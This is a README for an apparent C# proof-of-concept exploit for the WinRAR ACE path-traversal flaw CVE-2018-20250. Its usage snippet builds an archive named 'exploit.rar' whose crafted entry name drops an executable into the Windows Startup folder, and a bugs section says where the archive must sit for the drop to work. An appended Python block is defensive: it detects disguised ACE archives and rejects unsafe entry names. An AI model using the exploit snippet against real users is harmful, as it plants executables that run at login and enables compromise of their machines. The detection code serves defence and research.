
Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).


easis/CVE-2018-20250-WinRAR-ACE


CVE-2018-20250-WinRAR-ACE

Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

Resources

https://research.checkpoint.com/extracting-code-execution-from-winrar/
https://github.com/droe/acefile
https://apidoc.roe.ch/acefile/latest/

Dependencies

InvertedTomato.Crc (you can install it with NuGet) for the checksum method. You can use any other JAMCRC implementation.

How to use

  AceVolume av = new AceVolume();
  AceFile f = new AceFile(
    @"D:\some_file.exe",
    @"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
  );
  av.AddFile(f);
  av.Save("exploit.rar");
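
A defender-side check for the archive this snippet produces, as an added example that is not part of the repository's code: it identifies ACE content by the `**ACE**` marker at offset 7 regardless of the file extension, and shows that the entry name above contains no `..` path component, so a validator has to reject the colon as well. The function names and the sample header bytes are constructed for illustration; a self-extracting stub in front of the ACE header is not handled.

```python
import ntpath
import re

ACE_MAGIC = b"**ACE**"        # sits at offset 7 of an ACE main header
RAR_MAGIC = b"Rar!\x1a\x07"   # first bytes of a genuine RAR 4.x/5.x archive

# Constructed sample: 7 filler bytes, the ACE marker, then padding.
SAMPLE_ACE_HEAD = bytes(7) + ACE_MAGIC + bytes(16)
# Entry name taken from the usage snippet on this page.
PAGE_ENTRY = (r"C:\C:C:../AppData\Roaming\Microsoft\Windows"
              r"\Start Menu\Programs\Startup\some_file.exe")


def sniff_archive(data):
    """Classify an archive by content, ignoring what the file name claims."""
    if data.startswith(RAR_MAGIC):
        return "rar"
    if data[7:14] == ACE_MAGIC:
        return "ace"
    return "unknown"


def is_disguised_ace(file_name, data):
    """True for ACE content that does not carry an .ace extension."""
    return sniff_archive(data) == "ace" and not file_name.lower().endswith(".ace")


def entry_path_problems(entry_name):
    """Reasons an archive member name must not be used as an extraction path."""
    problems = []
    if ":" in entry_name:                       # drive spec or alternate stream
        problems.append("drive-or-stream-colon")
    if entry_name.startswith(("\\", "/")):      # rooted or UNC path
        problems.append("rooted")
    if ".." in re.split(r"[\\/]+", entry_name):  # plain parent-directory hop
        problems.append("dotdot-component")
    return problems


def stays_inside(dest_dir, entry_name):
    """Resolve the name under dest_dir with Windows rules; confirm containment."""
    if entry_path_problems(entry_name):
        return False
    dest = ntpath.normcase(ntpath.normpath(dest_dir))
    full = ntpath.normcase(ntpath.normpath(ntpath.join(dest, entry_name)))
    return full.startswith(dest + "\\")
```
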

Bugs

It seems to extract to the Startup folder only when the .rar file is on the Desktop or in any folder at the same level.
